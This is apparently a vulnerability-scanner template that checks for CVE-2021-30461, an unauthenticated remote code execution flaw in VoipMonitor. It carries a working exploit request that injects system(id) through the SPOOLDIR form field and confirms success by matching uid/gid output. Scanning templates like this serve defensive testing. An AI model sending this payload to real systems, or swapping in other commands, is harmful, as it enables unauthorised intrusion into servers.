id: CVE-2021-30461

info:
  name: VoipMonitor Pre-Auth-RCE
  author: shifacyclewala,hackergautam
  severity: critical
  description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
  tags: cve,cve2021,rce,voipmonitor
  reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 35

        SPOOLDIR=test".system(id)."&recheck=Recheck

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
          - "gid="
          - "groups="
          - "VoIPmonitor installation"
        part: body
        condition: and

      - type: status
        status:
          - 200
